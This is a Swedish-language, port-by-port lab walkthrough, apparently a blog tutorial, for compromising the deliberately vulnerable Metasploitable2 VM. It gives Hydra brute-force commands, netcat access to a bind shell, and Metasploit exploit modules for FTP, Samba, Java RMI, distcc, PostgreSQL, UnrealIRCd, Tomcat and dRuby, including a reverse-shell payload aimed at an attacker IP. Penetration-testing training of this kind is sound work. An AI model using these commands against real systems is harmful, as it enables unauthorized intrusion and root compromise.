- Metasploitable2 Complete Overview
- Exploatering av alla portar i olika tekniker :
- 22-SSH
- 23-TELNET
- 25-SMTP
- Metod 2
- 139&445 Netbios-SSN
- 1099-Java-RMI
- Exploatering av java-RMI-server
- 1524-BINDSHELL
- Exploatering
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Exploatering av port 3632 med hjälp av distcc-exec
- Exploatering av PostgreSQL med postgre_payload
- 5900-VNC
- 6000-X11
- Exploatering av port 6000 med hjälp av ssh
- 6667 & 6697 UnrealIRCD
- Metod 1: på port 6667
- Metod 2: På port 6697
- 8180-TOMCAT
- Exploiting Apache-Tomcat
- 8787-Ruby-drb
Metasploitable2 Complete Overview
Metasploitable är en avsiktligt sårbar virtuell Linux-maskin.
Denna virtuella maskin kan användas för att genomföra säkerhetsutbildningar, testa säkerhetsverktyg och öva på vanliga metoder för penetrationstestning.
Installation och konfiguration
Vi är här för att utnyttja Metasploitable 2 (Förbannat sårbar maskin för penetrationstestning)
Hämta denna Metasploiable2-maskin från https://information.rapid7.com/download-metasploitable-2017.html
Installationsprocess:
- Öppna VirtualBox och klicka på ”New”-knappen för att skapa en ny virtuell maskin
- Typ namnet på den virtuella maskinen (Metasploitable2)
- Allokera minnesmängden (helst men inte under 512mb)
- Välj Använd en befintlig hårddiskfil
- Välj vmdk-filen som du har laddat ner från Rapid7
- Klicka på Create…!!! Framgångsrik installation av Metasploitable2, Nu är det dags att konfigurera nätverksinställningarna.
Efter installationen ändrar du inställningarna för nätverkskortet enligt följande :
In-Network Setting: Välj Ethernet eller Trådlöst
I fliken Avancerat Välj: Inställningar/Nätverk/Adapter: Promiscuous Mode as Allow All
Starta Metasploitable2-maskinen och försök att logga in med de givna inloggningsuppgifterna på Banner…!!!!
Hitta maskinens IP-adress genom att använda följande kommandot i terminalen
ifconfig
Det var allt för installationen….Låt oss börja hacka…
Scanning
Scanning av Matasploitable 2
Som vi märkte är maskinens IP-adress 192.168.0.130
Låt oss börja skanna med Nmap som är en del av Kali Linux
nmap -sV -p- 192.168.0.130
Exploatering av alla portar i olika tekniker :
Metod 1:
Inloggning med Anonymous som användarnamn och utan lösenord.
Om du behöver mer information om Anonymous FTP kan du hitta den här.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Metod 2 :
Genom Brute-force med hjälp av Hydra, men du måste ha en anpassad lista med användarnamn och lösenord.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
Den kommer att ta varje användarnamn och lösenord från de givna filerna och försöka logga in på FTP-tjänsten.
När du har hittat inloggningsuppgifterna kan du logga in direkt.
När du har loggat in på ett användarkonto kan du få root-åtkomst genom att göra Privilege escalation.
Metod 3 :
Exploiting FTP through Metasploit framework
open Metasploit framework console and search for vsftpd Backdoor exploit
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Gratulationer, du har fått rotåtkomst
22-SSH
Secure Shell (SSH) är ett kryptografiskt nätverksprotokoll för säker drift av nätverkstjänster över ett osäkrat nätverk.
Exploatering av SSH med olika tekniker
Metod 1
Kracka användarnamn och lösenord med Hydra
Hydra är ett inbyggt verktyg i Kali-Linux som används för att Brute force-attack är en trial-and-error-metod som används av tillämpningsprogram för att avkoda krypterade data, t.ex. lösenord eller DES-nycklar (Data Encryption Standard), genom uttömmande ansträngning (med hjälp av brute force) snarare än genom att använda intellektuella strategier.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Metod 2
Öppna Metasploit ramverk
Öppna terminalen och skriv dessa kommandon :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
Sätt in den här hjälparen och se vad den kräver.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Inställ fördefinierade användarnamn lista och lösenord lista
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
Det kommer att ta tid-baserade dina användarnamn och lösenord lista och det kommer att meddela med användarnamn: lösenord och logga in med dessa uppgifter.
ssh username@targetipaddress
Du har användaraccess, kan inte utföra alla uppgifter så försök att få root-åtkomst genom att göra Privilege escalation.
23-TELNET
Telnet är ett enkelt, textbaserat nätverksprotokoll som används för att komma åt fjärrdatorer via TCP/IP-nätverk som Internet. Telnet skapades och lanserades 1969 och historiskt sett kan man säga att det var det första Internet.
telnet <target IP Address> --> 192.168.0.130
Som standard kommer den att Grab Metasploitable 2 banner, den visar att Logga in med msfadmin/msfadmin för att få en start. Ange bara dessa autentiseringsuppgifter så är du inne.
25-SMTP
SMTP är en del av applikationslagret i TCP/IP-protokollet. Med hjälp av en process som kallas ”store and forward” flyttar SMTP din e-post på och över nätverk. Det har ett nära samarbete med något som kallas Mail Transfer Agent (MTA) för att skicka din kommunikation till rätt dator och e-postinkorg.
Metod 1:
Användning av Metasploit
Starta Metasploit genom att utföra kommandona
service postgresql startmsfconsole -qsearch smtp_version
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP står för Simple Mail Transport Protocol och är en server-till-server-protokoll och har en lokal databas med användare som den måste skicka och ta emot e-post till.
SMTP har en uppsättning kommandon. Vi kommer att ansluta till vårt mål med ”netcat” via port 25 och försöka förvärva denna databas e-postmeddelanden.
Öppna en ny terminal och skriv:
nc 192.168.0.130 25
Nu är anslutningen upprättad och du kan verifiera den med hjälp av ”SMTP”-kommandona
vrfy (Detta är ett icke-interaktivt skal)
För SMTP-kommandon besök: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Metod 2
Användning av smtp_enum
Detta kan göras av Metasploit
search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Denna metod använder uppräkning för att ta reda på listan över användare i SMTP-tjänsten.
Senare NetCat kan vara till hjälp för att få en omvänd anslutning med den användaren.
139&445 Netbios-SSN
Samba är ett projekt med öppen källkod som används i stor utsträckning på Linux- och Unix-datorer för att de ska kunna arbeta med Windows fil- och utskriftstjänster.
Vi kan till och med använda Samba som en Active-server för att sköta inloggning, autentisering och åtkomstkontroll för ett Windows-nätverk.
Sök efter exploit
use exploit/multi/samba/usermap_script
.
För att se alternativen för exploateringen
show optionsSet RHOST192.168.0.130 (Target IP address)
Inställer nyttolast
Show payloadsSet payload cmd/unix/reverse
Inställer nödvändiga argument för nyttolast
.
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Kontrollera när alla erforderliga argument är fyllda
exploit
1099-Java-RMI
Remote Method Invocation (RMI) är ett API som gör det möjligt för ett objekt att åberopa en metod på ett objekt som finns i ett annat adressutrymme, som kan finnas på samma maskin eller en fjärrmaskin.
Exploatering av java-RMI-server
sök efter exploateringen
search java_rmi_server
Välj exploateringen enligt deras rang, till exempel fungerar ”utmärkt” bättre än ”normal”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Vi har fått tillgång till målmaskinen.
1524-BINDSHELL
Bind shell är en typ av shell där målmaskinen öppnar en kommunikationsport eller en lyssnare på offrets maskin och väntar på en inkommande anslutning. Angriparen ansluter sedan till offermaskinens lyssnare vilket sedan leder till att kod eller kommando exekveras på servern.
Exploatering
Det är ett rotskal så vi kan ansluta via netcat-tjänsten.
nc <target ip address> 1524
Gratulerar, du är en rotanvändare nu.
2121-ProFTPD
För att utnyttja denna port måste du ha inloggningsuppgifter så som vi vet metoden få det genom Brute-force teknik, Vi kan komma åt ProFTPd med telnet, Vi använder här user: user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
Det är en normal användare, Försök med Privilege Escalation för att få rotkontroll.
3306-MYSQL
Metod 1:
sök efter exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
Ibland kan det finnas en chans att ha ett tomt lösenord för MySQL. Så vi kan utnyttja det direkt.
Notera: som standard visas BLANK_PASSWORDS som falsk, sätt det till true.
set BLANK_PASSWORDS as true
Metod:2
I den här metoden kommer vi att exploatera MySQL med hjälp av det här kommandot som anger användarnamnet root och målets IP.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc är ett verktyg för att påskynda kompileringen av källkod med hjälp av distribuerad databehandling över ett datornätverk. Med rätt konfiguration
distcc kan dramatiskt minska ett projekts kompileringstid
Exploatering av port 3632 med hjälp av distcc-exec
Öppna msfconsole och sök efter distcc_exec
search distcc_execshow options
Inställ nödvändiga argument för att exploatera
set RHOSTS <target-ip>exploit
Vi fick tillgång till skalan…Försök att göra privilegieeskalering för högre privilegier
Exploatering av PostgreSQL med postgre_payload
Öppna msfconsole & sök efter postgres_payload
.
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Inställ nödvändiga argument för exploateringen
set RHOSTS <target-ip>
Som standard, kommer den att använda användarnamn som postgres
exploit
Successfully logged in postgresql…Låt oss få ett skal för att göra fler saker…
Försök att göra privilegieeskalering…Glad inlärning..!!!
5900-VNC
Öppna msfconsole och sök efter exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Denna metod används för att utnyttja VNC-programvara som finns på Linux, Unix eller Windows operativsystem med autentiseringssårbarhet.
Försök att ansluta vnc med det lösenordet
Öppna Vnc Viewer i Terminal & Skriv in IP-adressen och anslut
en inloggningsfråga dyker upp. och ber dig ange inloggningsuppgifter
Inför sedan lösenordet och klicka på OK.
Voilaaa…!!!! du har Access…Jag vet vad du tänker just nu…Rör inte med saker runt omkring..Happy Learning.
6000-X11
The X Window System (alias X) är ett fönstersystem för bitmappskärmar, som är vanligt i UNIX-baserade operativsystem. X tillhandahåller den grundläggande ramen för en GUI-baserad miljö.
Den fjärrstyrda X11-servern accepterar anslutningar från varhelst man kan få en Internetanslutning. Den ansvarar för åtkomst till grafikkortet, inmatningsenheterna och bildskärmen på antingen datorn eller den trådlösa enheten.
Exploatering av port 6000 med hjälp av ssh
ssh -X -l msfadmin 192.168.0.122
I kommandot ovan aktiverar ”X” alla portar som vidarebefordras, genom att ange användarnamn och målets IP ger oss skalet
6667 & 6697 UnrealIRCD
UnrealIRCd är en IRC-server med öppen källkod som betjänar tusentals nätverk sedan 1999. Den körs på Linux, OS X och Windows
UnrealIRCd är en mycket avancerad IRCd med starkt fokus på modularitet, en avancerad och mycket konfigurerbar konfigurationsfil. Viktiga funktioner inkluderar SSL
UnrealIRCd är en av de mest populära och fullfjädrade IRC-daemonerna och används på det största antalet IRC-servrar
Den här servern beskrivs som att den kanske har flest säkerhetsfunktioner av alla IRC-servrar.
Använda protokoll: Internet Relay Chat
Låt oss utnyttja denna IRC-server.
Metod 1: på port 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Inställ nödvändiga argument för exploatering
set RHOSTS <target-ip>
Som standard tilldelas portnummer 6667 till exploit
run (or) exploit
Heyyy….Vi har rot…Vi lever på gränsen…
Metod 2: På port 6697
Använd ovanstående exploit och ställ in de nödvändiga argumenten
- Denna gång ställde du in port som 6697
set RHOSTS <target-ip>set RPORT 6697
Och för andra gången fick vi root…Försök att utnyttja detta…Happy learning
8180-TOMCAT
Apache Tomcat är en implementering med öppen källkod av teknikerna Java Servlet, JavaServer Pages, Java Expression Language och WebSocket. Tomcat tillhandahåller en ”ren Java” HTTP-webbservermiljö där Java-kod kan köras.
Exploiting Apache-Tomcat
Det kan göras i två steg:
Öppna msfconsole & sök efter tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Exploit kommer att tilldela standardanvändarnamn & lösenordslistor. Efter att ha ställt in argumenten för exploit Typ exploit (or) run
run
Ta samma användarnamn och lösenord och ge det till nästa exploit.
sök efter tomcat manager exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Sätt RHOSTS, RPORT och HttpPassword, HttpUsername som vi fick från tomcat login exploit och kör sedan exploit.
msfconsole skulle kunna tilldela lämplig nyttolast för en exploatering, Det är därför vi fick meterpreter…
8787-Ruby-drb
dRuby är ett distribuerat objektsystem för Ruby. Det är skrivet i ren Ruby och använder dess protokoll.
Ingen tilläggstjänster behövs utöver dem som tillhandahålls av Ruby-körtiden, t.ex. TCP-socklar.
search drb_remote_codeexec
Inställ de nödvändiga argumenten för att utnyttja
show optionsset RHOSTS <target-ip>exploit (or) run
Grattis, du har fått tillgång till skalet som root… försök att använda några skalkommandon.